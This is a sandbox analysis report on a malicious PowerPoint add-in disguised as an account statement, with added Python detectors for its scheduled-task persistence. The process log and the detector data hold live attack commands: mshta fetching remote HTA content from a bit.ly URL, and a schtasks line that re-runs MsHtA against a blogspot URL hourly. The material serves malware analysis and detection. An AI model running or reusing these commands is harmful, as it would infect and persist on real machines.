File name: Statement of account_2021.ppa.zip (an archive containing Statement of account_2021.ppa, a legacy PowerPoint add-in, which POWERPNT.EXE opens in the run below)

Full analysis: https://app.any.run/tasks/0e06b891-8f78-4a19-9e79-1ce79d7309f9
Verdict: Malicious activity
Analysis date: January 24, 2022, 21:04:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: A879DC616FBB2306BEA5FF75E0DBB9E0
SHA1: 0B5783662C3706C94D31DD89DB41344114E74A87
SHA256: 50D24C93FFD809D097C2ADC221A1D11C76A9678048E99228E2C58552306D0B70
SSDEEP: 384:7PcGxBjf6AST1kUjDvMxdqiRa8ZxlZB0AWUD2:7PPxBjSXT1jUNaUBLvD2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • POWERPNT.EXE (PID: 2784)
    • Unusual execution from Microsoft Office

      • POWERPNT.EXE (PID: 2784)
    • Changes settings of System certificates

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3692)
      • schtasks.exe (PID: 3848)
      • schtasks.exe (PID: 1852)
  • SUSPICIOUS

    • Reads the computer name

      • WinRAR.exe (PID: 3420)
      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Checks supported languages

      • WinRAR.exe (PID: 3420)
      • mshta.exe (PID: 2960)
      • cmd.exe (PID: 2280)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Creates files in the user directory

      • mshta.exe (PID: 2960)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 1468)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2280)
  • INFO

    • Checks supported languages

      • POWERPNT.EXE (PID: 2784)
      • schtasks.exe (PID: 3692)
      • chrome.exe (PID: 1468)
      • chrome.exe (PID: 1248)
      • chrome.exe (PID: 288)
      • chrome.exe (PID: 2500)
      • chrome.exe (PID: 2088)
      • chrome.exe (PID: 1644)
      • chrome.exe (PID: 2832)
      • chrome.exe (PID: 2704)
      • chrome.exe (PID: 3212)
      • chrome.exe (PID: 3680)
      • chrome.exe (PID: 1696)
      • chrome.exe (PID: 2428)
      • chrome.exe (PID: 1444)
      • chrome.exe (PID: 2400)
      • chrome.exe (PID: 2548)
      • chrome.exe (PID: 1532)
      • chrome.exe (PID: 3952)
      • chrome.exe (PID: 2156)
      • schtasks.exe (PID: 3848)
      • chrome.exe (PID: 2924)
      • chrome.exe (PID: 2932)
      • chrome.exe (PID: 596)
      • chrome.exe (PID: 2748)
      • schtasks.exe (PID: 1852)
    • Manual execution by user

      • POWERPNT.EXE (PID: 2784)
      • chrome.exe (PID: 1468)
      • cmd.exe (PID: 2280)
    • Reads Microsoft Office registry keys

      • POWERPNT.EXE (PID: 2784)
    • Reads the computer name

      • POWERPNT.EXE (PID: 2784)
      • chrome.exe (PID: 1468)
      • schtasks.exe (PID: 3692)
      • chrome.exe (PID: 1248)
      • chrome.exe (PID: 2088)
      • chrome.exe (PID: 2428)
      • chrome.exe (PID: 3212)
      • chrome.exe (PID: 1532)
      • chrome.exe (PID: 2156)
      • chrome.exe (PID: 2932)
      • schtasks.exe (PID: 3848)
      • chrome.exe (PID: 2924)
      • schtasks.exe (PID: 1852)
    • Creates files in the user directory

      • POWERPNT.EXE (PID: 2784)
    • Reads settings of System Certificates

      • mshta.exe (PID: 2960)
      • chrome.exe (PID: 2088)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Checks Windows Trust Settings

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Reads internet explorer settings

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Reads the hosts file

      • chrome.exe (PID: 1468)
      • chrome.exe (PID: 2088)
    • Application launched itself

      • chrome.exe (PID: 1468)
    • Reads the date of Windows installation

      • chrome.exe (PID: 2924)
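The "Uses Task Scheduler to run other applications" and "Changes the autorun value in the registry" indicators above correspond to the schtasks command line recorded under Process information, which registers a task that re-launches MsHtA against a blogspot URL every 60 minutes. After containment, a responder wants to find that artifact at rest, not just in the process log. The following is an added example, not code from the report or from ANY.RUN: it audits Task Scheduler XML definitions (the format `schtasks /query /xml` exports and the files under C:\Windows\System32\Tasks use) and flags tasks whose Exec action launches a script host with a URL argument. The two task definitions are constructed for the example; the first is modelled on what the report's schtasks line would create, the second is a benign control.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Task Scheduler's XML namespace (used by `schtasks /query /xml` exports and
# the task files under C:\Windows\System32\Tasks).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"mshta", "powershell", "pwsh", "wscript", "cscript", "cmd", "rundll32", "regsvr32"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed task definitions (assumption of this example, not exports from the
# sandbox run). The first is modelled on what the report's schtasks line would
# create: task name Bluefibxonashi, a 60-minute repetition, action MsHtA + URL.
# The second is a benign control task.
TASKS: Dict[str, str] = {
    "Bluefibxonashi": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT60M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2022-01-24T21:04:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>MsHtA</Command>
      <Arguments>https://thankyouforeverythingeheheh.blogspot.com/p/gibson-1.html</Arguments>
    </Exec>
  </Actions>
</Task>""",
    "NightlyBackup": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2022-01-01T02:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Tools\backup.exe</Command>
      <Arguments>--target \\fileserver\backups</Arguments>
    </Exec>
  </Actions>
</Task>""",
}


def iso_minutes(duration: str) -> int:
    """Minutes in the PnDTnHnMnS duration subset Task Scheduler emits (PT60M -> 60)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration or "")
    if not m:
        return 0
    days, hours, mins, _secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins


def audit_task(name: str, xml_text: str) -> Dict:
    """Flag Exec actions that run a script host with a URL argument and report
    how often the task repeats."""
    root = ET.fromstring(xml_text)
    hits: List[str] = []
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        command = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS) or ""
        # Normalise "MsHtA", "mshta.exe" and full paths to one host name.
        host = command.replace("\\", "/").rsplit("/", 1)[-1].lower()
        host = host[:-4] if host.endswith(".exe") else host
        url = URL_RE.search(args)
        if host in SCRIPT_HOSTS and url:
            hits.append(f"{host} fetches {url.group(0)}")
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS)
    return {"task": name, "interval_minutes": iso_minutes(interval), "hits": hits}


def suspicious_tasks(tasks: Dict[str, str]) -> List[str]:
    """Names of tasks with at least one flagged action."""
    return [n for n, x in tasks.items() if audit_task(n, x)["hits"]]


if __name__ == "__main__":
    for n, x in TASKS.items():
        print(audit_task(n, x))
```

On a live host the same function can be fed the output of `schtasks /query /xml /tn <name>` or the raw task files; the repetition interval is worth keeping in the finding, since a script host fetching a URL on a fixed short cycle is the beaconing pattern this task implements.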
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Statement of account_2021.ppa
ZipUncompressedSize: 80896
ZipCompressedSize: 13413
ZipCRC: 0xe025902a
ZipModifyDate: 2022:01:24 21:03:09
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
All screenshots are available in the full report
Total processes: 75
Monitored processes: 31
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Launch order recorded in the graph (interactive view in the full report): winrar.exe, powerpnt.exe, mshta.exe, schtasks.exe, the chrome.exe process group, cmd.exe, then two further mshta.exe / schtasks.exe pairs.

Process information

Each entry gives the PID, command line, image path and parent process, followed by process details and loaded modules.
PID: 3420
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Statement of account_2021.ppa.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: Explorer.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 2784
CMD: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\Desktop\Statement of account_2021.ppa"
Path: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Parent process: Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Exit code:
0
Version:
14.0.6009.1000
Modules
Images
c:\program files\microsoft office\office14\powerpnt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\ppcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2960
CMD: mshta http://bitly.com/tywuiqdbshagdjshadvgha
Path: C:\Windows\system32\mshta.exe
Parent process: POWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\lpk.dll
PID: 3692
CMD: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/gibson-1.html\""
Path: C:\Windows\System32\schtasks.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 1468
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe"
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: Explorer.EXE
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
PID: 2500
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=86.0.4240.198 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x6e13d988,0x6e13d998,0x6e13d9a4
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
PID: 1248
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1068 /prefetch:2
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
PID: 2088
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1340 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
PID: 288
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1820 /prefetch:1
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shlwapi.dll
PID: 2832
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1932 /prefetch:1
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
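The three entries that matter for detection are POWERPNT.EXE (PID 2784) spawning mshta.exe with a bit.ly URL, and that mshta.exe (PID 2960) spawning schtasks.exe to register a task whose action is again MsHtA plus a URL. The following is an added example, not code from the report or from ANY.RUN: it runs three process-creation rules over a constructed, Sysmon-style event list whose PIDs, images, parents and command lines are copied from the entries above (the record layout and the `ppid: None` for processes whose parent Explorer.EXE has no PID in the report are assumptions of the example). The schtasks parser tolerates the doubled and escaped quotes in the recorded command line, and each finding carries the parent chain rebuilt from PID links.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events modelled on the Process information
# section of this report. PIDs, images, parent names and command lines are the
# report's; the record layout (a simplified Sysmon-style dict) is an assumption
# of this example, not ANY.RUN's export format. ppid is None where the report
# names the parent (Explorer.EXE) but lists no PID for it.
EVENTS: List[Dict] = [
    {"pid": 3420, "ppid": None, "parent_image": "Explorer.EXE",
     "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmd": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Statement of account_2021.ppa.zip"'},
    {"pid": 2784, "ppid": None, "parent_image": "Explorer.EXE",
     "image": r"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\Desktop\Statement of account_2021.ppa"'},
    {"pid": 2960, "ppid": 2784, "parent_image": "POWERPNT.EXE",
     "image": r"C:\Windows\system32\mshta.exe",
     "cmd": "mshta http://bitly.com/tywuiqdbshagdjshadvgha"},
    {"pid": 3692, "ppid": 2960, "parent_image": "mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn ""Bluefibxonashi"" /F '
            r'/tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/gibson-1.html\""'},
    {"pid": 1468, "ppid": None, "parent_image": "Explorer.EXE",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Stop a URL at whitespace, a quote or a backslash so the escaped quotes in
# the schtasks /tr argument are not swallowed into the URL.
URL_RE = re.compile(r'https?://[^\s"\\]+', re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_schtasks_create(cmd: str) -> Optional[Dict]:
    """Pull task name, schedule and action out of a `schtasks /create` line.
    Returns None for any other schtasks invocation."""
    if "/create" not in cmd.lower():
        return None
    tn = re.search(r"/tn\s+(\S+)", cmd, re.IGNORECASE)
    sc = re.search(r"/sc\s+(\w+)(?:\s+/mo\s+(\d+))?", cmd, re.IGNORECASE)
    tr = re.search(r"/tr\s+(.*)$", cmd, re.IGNORECASE)
    action = tr.group(1) if tr else ""
    url = URL_RE.search(action)
    return {
        "task": tn.group(1).strip('"') if tn else None,   # strips the doubled quotes
        "schedule": sc.group(1).upper() if sc else None,
        "every": int(sc.group(2)) if sc and sc.group(2) else 1,
        "action": action,
        "action_url": url.group(0) if url else None,
        "action_is_mshta": "mshta" in action.lower(),
    }


def analyze(events: List[Dict]) -> List[Dict]:
    """Apply the three rules and return findings with their parent chains."""
    by_pid = {e["pid"]: e for e in events}

    def chain(e: Dict) -> List[int]:
        # Walk parent links back as far as the data allows, oldest first.
        out, cur = [], e
        while cur is not None:
            out.append(cur["pid"])
            cur = by_pid.get(cur["ppid"]) if cur["ppid"] is not None else None
        return list(reversed(out))

    findings: List[Dict] = []
    for e in events:
        img, parent = _name(e["image"]), _name(e["parent_image"])
        # 1. Office application launching a script host / LOLBin.
        if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
            findings.append({"rule": "office_spawns_script_host", "pid": e["pid"],
                             "chain": chain(e), "detail": f"{parent} -> {img}"})
        # 2. mshta.exe handed a remote URL: HTA content fetched from the internet.
        if img == "mshta.exe":
            m = URL_RE.search(e["cmd"])
            if m:
                findings.append({"rule": "mshta_remote_url", "pid": e["pid"],
                                 "chain": chain(e), "detail": m.group(0)})
        # 3. schtasks /create whose action is itself mshta + URL: persistence.
        if img == "schtasks.exe":
            t = parse_schtasks_create(e["cmd"])
            if t and t["action_is_mshta"] and t["action_url"]:
                findings.append({"rule": "scheduled_task_mshta_url", "pid": e["pid"],
                                 "chain": chain(e), "detail": t})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f["rule"], f["chain"], f["detail"])
```

Rule 1 alone would also fire on benign Office automation, so the chain is what an analyst triages on: here it reads 2784 (POWERPNT.EXE) to 2960 (mshta.exe) to 3692 (schtasks.exe), and the schtasks finding carries the task name, the 60-minute schedule and the blogspot URL the task will re-fetch.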
Total events: 34 149
Read events: 33 666
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 0
Suspicious files: 141
Text files: 124
Unknown types: 16

Dropped files (PID, process, filename, type, hashes)

2784 POWERPNT.EXE  C:\Users\admin\AppData\Local\Temp\CVR6C34.tmp.cvr
  MD5: -
  SHA256: -
2960 mshta.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\X4OB0WW6.txt  (text)
  MD5: 0D37B12FDD4B7449CD10261414294388
  SHA256: 394194516EAE0944B215AFAF6F52D8E37CC3DE4E232ED6F5900889A1CF0E88A8
2960 mshta.exe  C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A70B016F15DC489095248B00F1A94BC5  (der)
  MD5: 578A411A58258A4FAFF77EBF5A69CB55
  SHA256: 77F36444A25C9BFCCCAF347C0E3BB030C08CB8498E06748CCD6CB1BF46FBA150
2960 mshta.exe  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\tywuiqdbshagdjshadvgha[1].htm  (html)
  MD5: A385AEDC5593AA858F44CC3599901934
  SHA256: B5E9F5CFE2E7E004D4C8E2BC072814D167CAAB3342B370B2FA8A880A556A9500
2960 mshta.exe  C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA  (der)
  MD5: 64E9B8BB98E2303717538CE259BEC57D
  SHA256: 76BD459EC8E467EFC3E3FB94CB21B9C77A2AA73C9D4C0F3FAF823677BE756331
2784 POWERPNT.EXE  C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Statement of account_2021.ppa.LNK  (lnk)
  MD5: 1BA4BAB3C3C093B3C13EADE49E161D67
  SHA256: 9C91820436488BD7A179B192CB2724830727A22B43864BEED5F17C217B1D63B7
2784 POWERPNT.EXE  C:\Users\admin\AppData\Local\Temp\~DF1CE7F203FB4FB975.TMP  (binary)
  MD5: 72F5C05B7EA8DD6059BF59F50B22DF33
  SHA256: 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
2960 mshta.exe  C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_052EA9D27EE3F7FAB6BA5A547FF91AB9  (binary)
  MD5: B8C77432AD0057A2DE95841979974C09
  SHA256: 08CE5386E9EE1D3E73B9D547219B4901B4496C85319E125644653A0AF8AE0954
2960 mshta.exe  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\gibson-78219hjez1[1].htm  (html)
  MD5: BD04F61786EE8602A99718F89EB81857
  SHA256: 5C439F638E26437A948F786356D65746E349B853C9D47DFE22318FDB9193EC8F
2784 POWERPNT.EXE  C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat  (ini)
  MD5: 0B0C3A830A800172045D94C45DEEB86B
  SHA256: 0326C09B21147B00E15676C74DB96CA775649A1AD9AD34D104BCF2DEF0F8FA90
HTTP(S) requests: 34
TCP/UDP connections: 47
DNS requests: 31
Threats: 0

HTTP requests (PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation; "-" where the report lists no value)

2960 | mshta.exe | GET | 200 | 142.250.186.131:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | US | der | 724 b | whitelisted
876 | svchost.exe | HEAD | 200 | 74.125.108.167:80 | http://r2---sn-2gb7sn7y.gvt1.com/edgedl/release2/chrome_component/adys6mm2sd23z36ns7e4hcs4hrqq_1.3.36.111/ihnlcenocehgdaegdmhbidjhnhdchfmm_1.3.36.111_win_ac5lwr5427en7czu7myxmee6c7xq.crx3?cms_redirect=yes&mh=8t&mip=45.86.202.16&mm=28&mn=sn-2gb7sn7y&ms=nvh&mt=1643058263&mv=m&mvi=2&pl=24&rmhost=r3---sn-2gb7sn7y.gvt1.com&shardbypass=yes | US | - | - | whitelisted
2960 | mshta.exe | GET | 200 | 142.250.186.131:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEBBSdsRhkc8RCgAAAAEre9c%3D | US | der | 471 b | whitelisted
2960 | mshta.exe | GET | 200 | 142.250.186.131:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | US | der | 1.41 Kb | whitelisted
876 | svchost.exe | HEAD | 403 | 34.104.35.123:80 | http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adys6mm2sd23z36ns7e4hcs4hrqq_1.3.36.111/ihnlcenocehgdaegdmhbidjhnhdchfmm_1.3.36.111_win_ac5lwr5427en7czu7myxmee6c7xq.crx3 | US | - | - | whitelisted
876 | svchost.exe | HEAD | 302 | 172.217.18.110:80 | http://redirector.gvt1.com/edgedl/release2/chrome_component/adys6mm2sd23z36ns7e4hcs4hrqq_1.3.36.111/ihnlcenocehgdaegdmhbidjhnhdchfmm_1.3.36.111_win_ac5lwr5427en7czu7myxmee6c7xq.crx3 | US | - | - | whitelisted
2960 | mshta.exe | GET | 200 | 142.250.186.131:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEFs93LXfWb93CgAAAAErfco%3D | US | der | 471 b | whitelisted
